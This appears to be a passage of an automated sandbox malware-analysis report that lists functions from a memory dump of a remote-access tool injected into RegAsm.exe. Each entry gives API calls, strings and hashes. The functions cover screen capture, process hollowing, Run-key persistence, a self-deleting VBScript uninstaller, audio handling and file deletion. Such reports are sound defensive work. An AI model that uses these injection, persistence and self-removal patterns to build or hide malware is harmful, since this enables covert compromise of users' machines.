                                                  • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                  • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                  Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                  • GetIconInfo.USER32 ref: 00418FF8
                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 479521175-865373369
                                                  • Opcode ID: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                  • Opcode Fuzzy Hash: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                  Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                  • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                  • WriteProcessMemory.KERNEL32 ref: 00418446
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                  • API String ID: 4188446516-3035715614
                                                  • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                  • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                  Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                  • API String ID: 1861856835-1447701601
                                                  • Opcode ID: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                  • Opcode Fuzzy Hash: b2c98317dfb15ea04512d0939afff2237e6240c9cbfa0792984ef7edd010dbee
                                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                  Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636D1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                  • API String ID: 3797177996-2483056239
                                                  • Opcode ID: b16f4ff0324610d66908360ca5266b80c4ed90a5df53e66aa792605ab2e73f2f
                                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                  • Opcode Fuzzy Hash: b16f4ff0324610d66908360ca5266b80c4ed90a5df53e66aa792605ab2e73f2f
                                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                  Function 004124B0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                  • API String ID: 2649220323-436679193
                                                  • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                  • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                  Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                  • API String ID: 738084811-2094122233
                                                  • Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                  • Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                  Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                  Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  • API String ID: 1646373207-255920310
                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                  Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                  • CopyFileW.KERNEL32 ref: 0040CF0B
                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                  • CopyFileW.KERNEL32 ref: 0040CFBF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                  • _wcslen.LIBCMT ref: 0040D001
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                  • CloseHandle.KERNEL32 ref: 0040D068
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                  • API String ID: 1579085052-2309681474
                                                  • Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                  • Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                  Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                  • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                  Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636D1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$0TG$0TG$NG$NG
                                                  • API String ID: 1223786279-2576077980
                                                  • Opcode ID: 8a10c5142e0a436527cf12f2743d925619f4a8520715e0567dc4bf1218efe3c8
                                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                  • Opcode Fuzzy Hash: 8a10c5142e0a436527cf12f2743d925619f4a8520715e0567dc4bf1218efe3c8
                                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                  Function 0044F4AD Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable
                                                  • String ID:
                                                  • API String ID: 1464849758-0
                                                  • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                  • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                  Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                  Download Yara Rule
                                                  APIs
